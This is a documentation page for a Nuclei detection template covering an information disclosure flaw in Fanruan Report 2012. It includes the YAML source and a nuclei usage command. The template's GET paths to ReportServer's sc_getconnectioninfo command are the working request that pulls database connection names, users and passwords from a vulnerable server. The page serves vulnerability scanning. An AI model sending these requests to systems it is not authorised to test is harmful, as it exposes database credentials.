Fanruan Report 2012 Information Disclosure
ID: fanruanoa2012-disclosure
Severity: high
Author: YanYun
Tags: oa,java,fanruan,disclosure
Description
Section titled “Description”Fanruan Report 2012 has an information disclosure vulnerability, and some sensitive information can be obtained by accessing a specific URL
YAML Source
Section titled “YAML Source”id: fanruanoa2012-disclosure
info: name: Fanruan Report 2012 Information Disclosure author: YanYun severity: high description: Fanruan Report 2012 has an information disclosure vulnerability, and some sensitive information can be obtained by accessing a specific URL reference: - http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E5%B8%86%E8%BD%AFOA/%E5%B8%86%E8%BD%AF%E6%8A%A5%E8%A1%A8%202012%20%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.html metadata: max-request: 2 tags: oa,java,fanruan,disclosure
http: - method: GET path: - "{{BaseURL}}/ReportServer?op=fr_server&cmd=sc_getconnectioninfo" - "{{BaseURL}}/WebReport/ReportServer?op=fr_server&cmd=sc_getconnectioninfo"
matchers-condition: and matchers: - type: status status: - 200
- type: word words: - '"connection"' - '"name"' - '"driver"' - '"password"' - '"url"' - '"user"' condition: and
- type: word words: - "application/json" part: header# digest: 490a0046304402206cab575c1dd28f5097a267818ad54e00f75edad48e3e0659ba7abd02920f98e40220448d1070b47c555765913a8c25e3f768cce5bbc467b0ecb1e7b5f9a64ecc8b37:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/vulnerabilities/other/fanruanoa2012-disclosure.yaml"